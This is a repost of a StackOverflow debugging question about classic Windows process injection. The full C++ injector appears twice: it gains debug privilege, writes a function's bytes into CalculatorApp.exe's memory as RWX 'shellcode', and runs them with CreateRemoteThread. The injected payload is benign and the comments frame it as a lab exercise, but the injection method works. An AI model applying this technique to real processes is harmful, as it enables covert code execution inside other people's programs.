CreateRemoteThread() завершается с кодом 5, когда в inject_begin() присутствует вызов inject_param->allocate(). Если закомментировать этот вызов, CreateRemoteThread() отрабатывает нормально. Я не понимаю, почему. Целевая платформа — 64-разрядная. (Судя по коду, значение 5 — это код завершения удалённого потока, который выводится через GetExitCodeThread(), а не ошибка самого вызова CreateRemoteThread().)
// Reconstructed: the include targets were stripped from the original paste.
// windows.h must precede tlhelp32.h; winternl.h provides NTSTATUS.
#include <windows.h>
#include <tlhelp32.h>
#include <winternl.h>
#include <cstdint>
#include <cstdio>
#include <cstdlib>
#include <string>
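// Walk the system process list and return the PID of the first process whose
// image name matches `name`; 0 if nothing matches or the snapshot cannot be
// taken.  The comparison is case-insensitive, as Windows image names are.
// Only the first match is returned, so a name shared by several processes
// (several instances of the same app) is ambiguous.
std::uint32_t get_process_id(
    const std::wstring& name) {
    PROCESSENTRY32W entry{};
    entry.dwSize = sizeof(entry);
    // The documented failure value is INVALID_HANDLE_VALUE, not NULL; the
    // original never checked it and would have passed it to Process32First.
    const HANDLE snapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE) {
        return 0;
    }
    std::uint32_t pid = 0;
    // Explicit W variants so the code does not silently depend on UNICODE.
    for (BOOL more = ::Process32FirstW(snapshot, &entry); more; more = ::Process32NextW(snapshot, &entry)) {
        if (::_wcsicmp(entry.szExeFile, name.c_str()) == 0) {
            pid = entry.th32ProcessID;
            break;
        }
    }
    ::CloseHandle(snapshot);
    return pid;
}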
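// Enable SeDebugPrivilege on the current process token.
//
// The privilege is only present in the token of an elevated administrator
// (or SYSTEM).  For anyone else LookupPrivilegeValue still succeeds, but
// AdjustTokenPrivileges returns TRUE and sets ERROR_NOT_ALL_ASSIGNED — the
// original ignored that and carried on as if the privilege were enabled.
// Returns true only when the privilege is actually enabled; without it,
// OpenProcess on a process of another user or at a higher integrity level
// fails with ERROR_ACCESS_DENIED (5).
bool adjust_token_privileges() {
    HANDLE token = nullptr;
    if (!::OpenProcessToken(::GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token)) {
        return false;
    }
    TOKEN_PRIVILEGES priv{};
    priv.PrivilegeCount = 1;
    priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    bool enabled = false;
    // SE_DEBUG_NAME is a TEXT() literal, so the TCHAR-generic lookup is used.
    if (::LookupPrivilegeValue(nullptr, SE_DEBUG_NAME, &priv.Privileges[0].Luid)) {
        // A TRUE return is not enough: the real verdict is in GetLastError().
        if (::AdjustTokenPrivileges(token, FALSE, &priv, 0, nullptr, nullptr)) {
            enabled = (::GetLastError() == ERROR_SUCCESS);
        }
    }
    ::CloseHandle(token);
    return enabled;
}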
// Signature of ntdll!NtAllocateVirtualMemory, resolved at run time with
// GetProcAddress (it is not exported through an import library).
using NTALLOCATEVIRTUALMEMORY = NTSTATUS(WINAPI*)(HANDLE ProcessHandle, PVOID* BaseAddress, ULONG ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);

// Parameter block handed to the injected thread.  It is copied into the target
// process byte-for-byte, so it may hold only plain data that is meaningful
// there: `allocate` is an address inside ntdll, usable across processes only
// because ntdll is mapped at one base address in every process until the next
// reboot (ASLR randomises it per boot, not per process).
struct InjectParam {
    int age;                          // counter the remote code bumps (1 -> 2)
    NTALLOCATEVIRTUALMEMORY allocate; // ntdll!NtAllocateVirtualMemory
};
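// ---------------------------------------------------------------------------
// "Shellcode": the compiled bytes of this function are copied verbatim into
// the target process and started there with CreateRemoteThread.  The body must
// therefore be position independent: no calls into this image, no string
// literals, no globals, no RIP-relative references of any kind.
//
// An MSVC Debug build quietly breaks that rule for exactly this function:
// taking the address of locals (&memory_address, &size) makes /RTC1 emit a
// call to _RTC_CheckStackVars (and may add a /GS cookie check), and /JMC adds
// __CheckForDebuggerJustMyCode.  All of those are calls to addresses that
// exist only in the injector, so the remote thread faults as soon as it
// reaches them.  That is the most plausible reason the thread only runs when
// the allocate() call — and with it the address-taken locals — is removed;
// confirm by disassembling the bytes that actually get copied.  The pragmas
// below turn the runtime checks off for this function; a Release build (or
// /Od without /RTC1 and /JMC) is the more reliable way to get clean bytes.
// ---------------------------------------------------------------------------
#pragma runtime_checks("", off)
#pragma strict_gs_check(push, off)
ULONG_PTR WINAPI inject_begin(InjectParam* inject_param) {
    inject_param->age += 1; // visible to the injector afterwards: 1 -> 2 means we ran
    PVOID memory_address = nullptr;
    SIZE_T size = 10;
    // Indirect call through a pointer the injector filled in — that is what
    // keeps this position independent (a direct VirtualAlloc call would go
    // through this image's IAT).  (HANDLE)-1 is NtCurrentProcess().
    // Requesting a fresh RWX region from a non-image address is the classic
    // signal EDRs alert on; fine for a lab experiment, not for anything shipped.
    const NTSTATUS status = inject_param->allocate((HANDLE)-1, &memory_address, 0, &size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    // Return the NTSTATUS so the injector's GetExitCodeThread() shows whether
    // the allocation succeeded (0 == STATUS_SUCCESS) instead of an opaque 0.
    return static_cast<ULONG_PTR>(static_cast<ULONG>(status));
}
#pragma strict_gs_check(pop)
#pragma runtime_checks("", restore)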
// Intended end marker for the shellcode copy.  remote_map_load_dll does not
// actually use it — it scans forward from inject_begin for 0xCCCC padding —
// so this only serves as a visual delimiter in the source.
void inject_end() {
    fputs("11", stdout);
}
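// Copy the bytes of inject_begin() plus an InjectParam into `target_process`
// and run them on a new thread there.  Despite the name no DLL is mapped: the
// injected code makes a single NtAllocateVirtualMemory call.
//
// `target_process` needs PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
// PROCESS_VM_OPERATION | PROCESS_VM_WRITE.  Injector and target must have the
// same bitness: the ntdll address and the struct layout copied below are those
// of this process.  The copied bytes must be position independent (see the
// note on inject_begin); a Debug build of that function usually is not.
//
// This is textbook CreateRemoteThread injection (RWX VirtualAllocEx +
// WriteProcessMemory + remote thread) — precisely the pattern AV/EDR products
// detect.  It is a lab exercise, not production code.
void remote_map_load_dll(HANDLE target_process)
{
    if (target_process == nullptr) {
        printf("remote_map_load_dll: invalid target process handle\r\n");
        return;
    }

    InjectParam inject_param{};   // value-initialised: replaces RtlZeroMemory
    inject_param.age = 1;

    // --- find the end of inject_begin -----------------------------------------
    // MSVC pads between functions with int3 (0xCC); the first aligned 0xCCCC
    // word after the function start is taken as its end.  This is a heuristic:
    // it assumes inject_begin's address is the real body (not an incremental-
    // link jump thunk), that 0xCC 0xCC never occurs inside the body, and that
    // padding exists at all (Release builds may pack functions without it).
    // The scan is capped so a missing marker cannot walk off the code section.
    constexpr DWORD kMaxShellCodeSize = 4096;
    const WORD* cursor = reinterpret_cast<const WORD*>(inject_begin);
    DWORD shell_code_size = 0;
    while (shell_code_size < kMaxShellCodeSize && *cursor != 0xCCCC) {
        ++cursor;
        shell_code_size += sizeof(WORD);
    }
    if (shell_code_size == 0 || shell_code_size >= kMaxShellCodeSize) {
        printf("shellcode length not found (no 0xCCCC padding within %lu bytes)\n", static_cast<unsigned long>(kMaxShellCodeSize));
        return;
    }
    printf("shellcode length:%lu\n", static_cast<unsigned long>(shell_code_size));

    // --- resolve ntdll!NtAllocateVirtualMemory --------------------------------
    // Valid inside the target only because ntdll shares one base address in
    // every process of this boot session.
    const HMODULE h_nt_dll = GetModuleHandleA("ntdll.dll");
    const FARPROC proc = h_nt_dll ? GetProcAddress(h_nt_dll, "NtAllocateVirtualMemory") : nullptr;
    if (proc == nullptr) {
        const DWORD err = GetLastError();
        printf("NtAllocateVirtualMemory not found (error %lu)\r\n", err);
        return;
    }
    inject_param.allocate = reinterpret_cast<NTALLOCATEVIRTUALMEMORY>(proc);
    printf("NtAllocateVirtualMemory address :0x%p\r\n", reinterpret_cast<void*>(proc));

    // --- allocate code + parameters in the target -----------------------------
    // One RWX region: the code needs X, and the InjectParam placed right behind
    // it is written by the remote thread (age += 1), so it needs W.  An RX code
    // page plus a separate RW data page would be the W^X-clean layout.
    const SIZE_T region_size = static_cast<SIZE_T>(shell_code_size) + sizeof(inject_param);
    PBYTE shell_code_address = static_cast<PBYTE>(VirtualAllocEx(target_process, nullptr, region_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE));
    if (shell_code_address == nullptr) {
        const DWORD err = GetLastError();
        printf("VirtualAllocEx failed (error %lu)\r\n", err);
        return;
    }
    PBYTE inject_param_address = shell_code_address + shell_code_size;
    printf("shell_code_address:0X%p\r\n", static_cast<void*>(shell_code_address));
    printf("InjectParamAddress:0X%p\r\n", static_cast<void*>(inject_param_address));

    // --- write the code, then the parameter block right after it --------------
    // Copied straight from inject_begin; the malloc'd staging buffer of the
    // original added nothing.  Errors are captured before any printf so that
    // the CRT cannot clobber GetLastError().
    SIZE_T written = 0;
    bool ok = WriteProcessMemory(target_process, shell_code_address, reinterpret_cast<const void*>(inject_begin), shell_code_size, &written) != FALSE
              && written == shell_code_size;
    DWORD err = ok ? ERROR_SUCCESS : GetLastError();
    printf("write ShellCodeAddress bytes:%zu\r\n", written);
    if (ok) {
        ok = WriteProcessMemory(target_process, inject_param_address, &inject_param, sizeof(inject_param), &written) != FALSE
             && written == sizeof(inject_param);
        err = ok ? ERROR_SUCCESS : GetLastError();
        printf("write InjectParamAddress bytes:%zu\r\n", written);
    }

    if (!ok) {
        printf("WriteProcessMemory failed (error %lu)\r\n", err);
    } else {
        HANDLE remote_thread = CreateRemoteThread(target_process, nullptr, 0, reinterpret_cast<LPTHREAD_START_ROUTINE>(shell_code_address), inject_param_address, 0, nullptr);
        if (remote_thread == nullptr) {
            err = GetLastError();
            printf("CreateRemoteThread failed (error %lu)\r\n", err);
        } else {
            printf("remote_thread:0x%p\n", remote_thread);
            WaitForSingleObject(remote_thread, INFINITE);
            // The exit code is whatever inject_begin returned (or the exception
            // code if the thread died) — it is NOT a Win32 error, so a value of
            // 5 must not be read as ERROR_ACCESS_DENIED.
            DWORD exit_code = 0;
            GetExitCodeThread(remote_thread, &exit_code);
            printf("remote thread exit code:0x%lx\n", exit_code);
            CloseHandle(remote_thread);
        }
    }

    // MEM_RELEASE with size 0 frees the whole region.  The original passed
    // MEM_FREE, which is a region *state* flag and not a valid dwFreeType, so
    // the call failed with ERROR_INVALID_PARAMETER and the RWX region leaked in
    // the target.  Freeing happens on every path now, not only after a
    // successful thread creation.
    VirtualFreeEx(target_process, shell_code_address, 0, MEM_RELEASE);
}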
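// Injector entry point: locate the target by image name, open it with the
// minimal access mask this injection needs, and run remote_map_load_dll.
//
// An unprivileged run typically fails at OpenProcess with ERROR_ACCESS_DENIED
// (5) unless the target is owned by the same user at the same or lower
// integrity level.  CalculatorApp.exe is a packaged (AppContainer) app, so it
// may be subject to additional restrictions — if results are confusing, try a
// plain Win32 process such as notepad.exe first.  Injecting into a process
// you do not own is never acceptable outside a lab you control.
int main() {
    adjust_token_privileges(); // best effort: only an elevated token can actually get SeDebugPrivilege

    // Variable is still called dwm_pid from an earlier experiment; the target
    // is whatever image name is passed here.
    const auto dwm_pid = get_process_id(L"CalculatorApp.exe");
    printf("dwmpid:%lu\r\n", static_cast<unsigned long>(dwm_pid));
    if (dwm_pid == 0) {
        printf("target process not found\r\n");
        system("pause");
        return EXIT_FAILURE;
    }

    // Least-privilege mask for this technique: thread creation, VM allocate/
    // protect, write, read, plus query (needed by CreateRemoteThread).
    const HANDLE h_handle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, dwm_pid);
    if (h_handle == nullptr) {
        const DWORD err = GetLastError();
        printf("OpenProcess failed (error %lu)\r\n", err);
        system("pause");
        return EXIT_FAILURE;
    }

    remote_map_load_dll(h_handle);
    CloseHandle(h_handle);
    system("pause");
    return EXIT_SUCCESS;
}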
Подробнее здесь: https://stackoverflow.com/questions/79260174/createremotethread-failed-5
CreateRemoteThread не удалось 5 ⇐ C++
1733610719
Anonymous
CreateRemoteThread() завершается с кодом 5, когда в inject_begin() присутствует вызов inject_param->allocate(). Если закомментировать этот вызов, CreateRemoteThread() отрабатывает нормально. Я не понимаю, почему. Целевая платформа — 64-разрядная. (Судя по коду, значение 5 — это код завершения удалённого потока, который выводится через GetExitCodeThread(), а не ошибка самого вызова CreateRemoteThread().)
#include
#include
#include
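// Walk the system process list and return the PID of the first process whose
// image name matches `name`; 0 if nothing matches or the snapshot cannot be
// taken.  The comparison is case-insensitive, as Windows image names are.
// Only the first match is returned, so a name shared by several processes
// (several instances of the same app) is ambiguous.
std::uint32_t get_process_id(
    const std::wstring& name) {
    PROCESSENTRY32W entry{};
    entry.dwSize = sizeof(entry);
    // The documented failure value is INVALID_HANDLE_VALUE, not NULL; the
    // original never checked it and would have passed it to Process32First.
    const HANDLE snapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE) {
        return 0;
    }
    std::uint32_t pid = 0;
    // Explicit W variants so the code does not silently depend on UNICODE.
    for (BOOL more = ::Process32FirstW(snapshot, &entry); more; more = ::Process32NextW(snapshot, &entry)) {
        if (::_wcsicmp(entry.szExeFile, name.c_str()) == 0) {
            pid = entry.th32ProcessID;
            break;
        }
    }
    ::CloseHandle(snapshot);
    return pid;
}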
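// Enable SeDebugPrivilege on the current process token.
//
// The privilege is only present in the token of an elevated administrator
// (or SYSTEM).  For anyone else LookupPrivilegeValue still succeeds, but
// AdjustTokenPrivileges returns TRUE and sets ERROR_NOT_ALL_ASSIGNED — the
// original ignored that and carried on as if the privilege were enabled.
// Returns true only when the privilege is actually enabled; without it,
// OpenProcess on a process of another user or at a higher integrity level
// fails with ERROR_ACCESS_DENIED (5).
bool adjust_token_privileges() {
    HANDLE token = nullptr;
    if (!::OpenProcessToken(::GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token)) {
        return false;
    }
    TOKEN_PRIVILEGES priv{};
    priv.PrivilegeCount = 1;
    priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    bool enabled = false;
    // SE_DEBUG_NAME is a TEXT() literal, so the TCHAR-generic lookup is used.
    if (::LookupPrivilegeValue(nullptr, SE_DEBUG_NAME, &priv.Privileges[0].Luid)) {
        // A TRUE return is not enough: the real verdict is in GetLastError().
        if (::AdjustTokenPrivileges(token, FALSE, &priv, 0, nullptr, nullptr)) {
            enabled = (::GetLastError() == ERROR_SUCCESS);
        }
    }
    ::CloseHandle(token);
    return enabled;
}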
// Signature of ntdll!NtAllocateVirtualMemory, resolved at run time with
// GetProcAddress (it is not exported through an import library).
using NTALLOCATEVIRTUALMEMORY = NTSTATUS(WINAPI*)(HANDLE ProcessHandle, PVOID* BaseAddress, ULONG ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);

// Parameter block handed to the injected thread.  It is copied into the target
// process byte-for-byte, so it may hold only plain data that is meaningful
// there: `allocate` is an address inside ntdll, usable across processes only
// because ntdll is mapped at one base address in every process until the next
// reboot (ASLR randomises it per boot, not per process).
struct InjectParam {
    int age;                          // counter the remote code bumps (1 -> 2)
    NTALLOCATEVIRTUALMEMORY allocate; // ntdll!NtAllocateVirtualMemory
};
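// ---------------------------------------------------------------------------
// "Shellcode": the compiled bytes of this function are copied verbatim into
// the target process and started there with CreateRemoteThread.  The body must
// therefore be position independent: no calls into this image, no string
// literals, no globals, no RIP-relative references of any kind.
//
// An MSVC Debug build quietly breaks that rule for exactly this function:
// taking the address of locals (&memory_address, &size) makes /RTC1 emit a
// call to _RTC_CheckStackVars (and may add a /GS cookie check), and /JMC adds
// __CheckForDebuggerJustMyCode.  All of those are calls to addresses that
// exist only in the injector, so the remote thread faults as soon as it
// reaches them.  That is the most plausible reason the thread only runs when
// the allocate() call — and with it the address-taken locals — is removed;
// confirm by disassembling the bytes that actually get copied.  The pragmas
// below turn the runtime checks off for this function; a Release build (or
// /Od without /RTC1 and /JMC) is the more reliable way to get clean bytes.
// ---------------------------------------------------------------------------
#pragma runtime_checks("", off)
#pragma strict_gs_check(push, off)
ULONG_PTR WINAPI inject_begin(InjectParam* inject_param) {
    inject_param->age += 1; // visible to the injector afterwards: 1 -> 2 means we ran
    PVOID memory_address = nullptr;
    SIZE_T size = 10;
    // Indirect call through a pointer the injector filled in — that is what
    // keeps this position independent (a direct VirtualAlloc call would go
    // through this image's IAT).  (HANDLE)-1 is NtCurrentProcess().
    // Requesting a fresh RWX region from a non-image address is the classic
    // signal EDRs alert on; fine for a lab experiment, not for anything shipped.
    const NTSTATUS status = inject_param->allocate((HANDLE)-1, &memory_address, 0, &size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    // Return the NTSTATUS so the injector's GetExitCodeThread() shows whether
    // the allocation succeeded (0 == STATUS_SUCCESS) instead of an opaque 0.
    return static_cast<ULONG_PTR>(static_cast<ULONG>(status));
}
#pragma strict_gs_check(pop)
#pragma runtime_checks("", restore)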
// Intended end marker for the shellcode copy.  remote_map_load_dll does not
// actually use it — it scans forward from inject_begin for 0xCCCC padding —
// so this only serves as a visual delimiter in the source.
void inject_end() {
    fputs("11", stdout);
}
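// Copy the bytes of inject_begin() plus an InjectParam into `target_process`
// and run them on a new thread there.  Despite the name no DLL is mapped: the
// injected code makes a single NtAllocateVirtualMemory call.
//
// `target_process` needs PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
// PROCESS_VM_OPERATION | PROCESS_VM_WRITE.  Injector and target must have the
// same bitness: the ntdll address and the struct layout copied below are those
// of this process.  The copied bytes must be position independent (see the
// note on inject_begin); a Debug build of that function usually is not.
//
// This is textbook CreateRemoteThread injection (RWX VirtualAllocEx +
// WriteProcessMemory + remote thread) — precisely the pattern AV/EDR products
// detect.  It is a lab exercise, not production code.
void remote_map_load_dll(HANDLE target_process)
{
    if (target_process == nullptr) {
        printf("remote_map_load_dll: invalid target process handle\r\n");
        return;
    }

    InjectParam inject_param{};   // value-initialised: replaces RtlZeroMemory
    inject_param.age = 1;

    // --- find the end of inject_begin -----------------------------------------
    // MSVC pads between functions with int3 (0xCC); the first aligned 0xCCCC
    // word after the function start is taken as its end.  This is a heuristic:
    // it assumes inject_begin's address is the real body (not an incremental-
    // link jump thunk), that 0xCC 0xCC never occurs inside the body, and that
    // padding exists at all (Release builds may pack functions without it).
    // The scan is capped so a missing marker cannot walk off the code section.
    constexpr DWORD kMaxShellCodeSize = 4096;
    const WORD* cursor = reinterpret_cast<const WORD*>(inject_begin);
    DWORD shell_code_size = 0;
    while (shell_code_size < kMaxShellCodeSize && *cursor != 0xCCCC) {
        ++cursor;
        shell_code_size += sizeof(WORD);
    }
    if (shell_code_size == 0 || shell_code_size >= kMaxShellCodeSize) {
        printf("shellcode length not found (no 0xCCCC padding within %lu bytes)\n", static_cast<unsigned long>(kMaxShellCodeSize));
        return;
    }
    printf("shellcode length:%lu\n", static_cast<unsigned long>(shell_code_size));

    // --- resolve ntdll!NtAllocateVirtualMemory --------------------------------
    // Valid inside the target only because ntdll shares one base address in
    // every process of this boot session.
    const HMODULE h_nt_dll = GetModuleHandleA("ntdll.dll");
    const FARPROC proc = h_nt_dll ? GetProcAddress(h_nt_dll, "NtAllocateVirtualMemory") : nullptr;
    if (proc == nullptr) {
        const DWORD err = GetLastError();
        printf("NtAllocateVirtualMemory not found (error %lu)\r\n", err);
        return;
    }
    inject_param.allocate = reinterpret_cast<NTALLOCATEVIRTUALMEMORY>(proc);
    printf("NtAllocateVirtualMemory address :0x%p\r\n", reinterpret_cast<void*>(proc));

    // --- allocate code + parameters in the target -----------------------------
    // One RWX region: the code needs X, and the InjectParam placed right behind
    // it is written by the remote thread (age += 1), so it needs W.  An RX code
    // page plus a separate RW data page would be the W^X-clean layout.
    const SIZE_T region_size = static_cast<SIZE_T>(shell_code_size) + sizeof(inject_param);
    PBYTE shell_code_address = static_cast<PBYTE>(VirtualAllocEx(target_process, nullptr, region_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE));
    if (shell_code_address == nullptr) {
        const DWORD err = GetLastError();
        printf("VirtualAllocEx failed (error %lu)\r\n", err);
        return;
    }
    PBYTE inject_param_address = shell_code_address + shell_code_size;
    printf("shell_code_address:0X%p\r\n", static_cast<void*>(shell_code_address));
    printf("InjectParamAddress:0X%p\r\n", static_cast<void*>(inject_param_address));

    // --- write the code, then the parameter block right after it --------------
    // Copied straight from inject_begin; the malloc'd staging buffer of the
    // original added nothing.  Errors are captured before any printf so that
    // the CRT cannot clobber GetLastError().
    SIZE_T written = 0;
    bool ok = WriteProcessMemory(target_process, shell_code_address, reinterpret_cast<const void*>(inject_begin), shell_code_size, &written) != FALSE
              && written == shell_code_size;
    DWORD err = ok ? ERROR_SUCCESS : GetLastError();
    printf("write ShellCodeAddress bytes:%zu\r\n", written);
    if (ok) {
        ok = WriteProcessMemory(target_process, inject_param_address, &inject_param, sizeof(inject_param), &written) != FALSE
             && written == sizeof(inject_param);
        err = ok ? ERROR_SUCCESS : GetLastError();
        printf("write InjectParamAddress bytes:%zu\r\n", written);
    }

    if (!ok) {
        printf("WriteProcessMemory failed (error %lu)\r\n", err);
    } else {
        HANDLE remote_thread = CreateRemoteThread(target_process, nullptr, 0, reinterpret_cast<LPTHREAD_START_ROUTINE>(shell_code_address), inject_param_address, 0, nullptr);
        if (remote_thread == nullptr) {
            err = GetLastError();
            printf("CreateRemoteThread failed (error %lu)\r\n", err);
        } else {
            printf("remote_thread:0x%p\n", remote_thread);
            WaitForSingleObject(remote_thread, INFINITE);
            // The exit code is whatever inject_begin returned (or the exception
            // code if the thread died) — it is NOT a Win32 error, so a value of
            // 5 must not be read as ERROR_ACCESS_DENIED.
            DWORD exit_code = 0;
            GetExitCodeThread(remote_thread, &exit_code);
            printf("remote thread exit code:0x%lx\n", exit_code);
            CloseHandle(remote_thread);
        }
    }

    // MEM_RELEASE with size 0 frees the whole region.  The original passed
    // MEM_FREE, which is a region *state* flag and not a valid dwFreeType, so
    // the call failed with ERROR_INVALID_PARAMETER and the RWX region leaked in
    // the target.  Freeing happens on every path now, not only after a
    // successful thread creation.
    VirtualFreeEx(target_process, shell_code_address, 0, MEM_RELEASE);
}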
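// Injector entry point: locate the target by image name, open it with the
// minimal access mask this injection needs, and run remote_map_load_dll.
//
// An unprivileged run typically fails at OpenProcess with ERROR_ACCESS_DENIED
// (5) unless the target is owned by the same user at the same or lower
// integrity level.  CalculatorApp.exe is a packaged (AppContainer) app, so it
// may be subject to additional restrictions — if results are confusing, try a
// plain Win32 process such as notepad.exe first.  Injecting into a process
// you do not own is never acceptable outside a lab you control.
int main() {
    adjust_token_privileges(); // best effort: only an elevated token can actually get SeDebugPrivilege

    // Variable is still called dwm_pid from an earlier experiment; the target
    // is whatever image name is passed here.
    const auto dwm_pid = get_process_id(L"CalculatorApp.exe");
    printf("dwmpid:%lu\r\n", static_cast<unsigned long>(dwm_pid));
    if (dwm_pid == 0) {
        printf("target process not found\r\n");
        system("pause");
        return EXIT_FAILURE;
    }

    // Least-privilege mask for this technique: thread creation, VM allocate/
    // protect, write, read, plus query (needed by CreateRemoteThread).
    const HANDLE h_handle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, dwm_pid);
    if (h_handle == nullptr) {
        const DWORD err = GetLastError();
        printf("OpenProcess failed (error %lu)\r\n", err);
        system("pause");
        return EXIT_FAILURE;
    }

    remote_map_load_dll(h_handle);
    CloseHandle(h_handle);
    system("pause");
    return EXIT_SUCCESS;
}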
Подробнее здесь: [url]https://stackoverflow.com/questions/79260174/createremotethread-failed-5[/url]